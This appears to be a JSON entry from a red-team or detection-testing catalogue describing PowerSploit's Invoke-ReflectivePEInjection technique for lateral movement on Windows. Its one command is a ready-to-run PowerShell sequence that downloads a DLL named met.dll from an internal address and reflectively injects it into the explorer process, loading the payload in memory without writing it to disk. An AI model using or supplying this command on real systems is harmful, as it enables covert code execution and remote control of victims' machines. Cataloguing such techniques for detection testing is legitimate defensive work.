{
"name": "Invoke-ReflectivePEInjection",
"phases": [
"07. Lateral Movement"
],
"category": "",
"stealthy": false,
"platforms": [
"Windows"
],
"source": "https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-ReflectivePEInjection.ps1",
"description": "The script performs reflection to avoid writing assemblies to disk, after which it parses the\ndesired PE file. It has two separate modes: the first reflectively loads a DLL or EXE into the\nsame process, and the second loads a DLL into a remote process.",
"undetected": [],
"detected": [],
"commands": [
{
"id": "051d902d-8712-40db-8e3c-756f07d216f3",
"name": "Download and inject DLL into memory",
"description": "Note that the public version of this script fails on Windows 10 version 1803 or newer due to the multiple instances of GetProcAddress in UnsafeNativeMethods.",
"tag": "",
"results": [],
"cmd": "$bytes = (New-Object\nSystem.Net.WebClient).DownloadData('http://192.168.10.10/met.dll')\n$procid = (Get-Process -Name explorer).Id\nImport-Module C:\\Tools\\Invoke-ReflectivePEInjection.ps1\nInvoke-ReflectivePEInjection -PEBytes $bytes -ProcId $procid"
}
],
"content": "",
"references": [],
"language": ""
}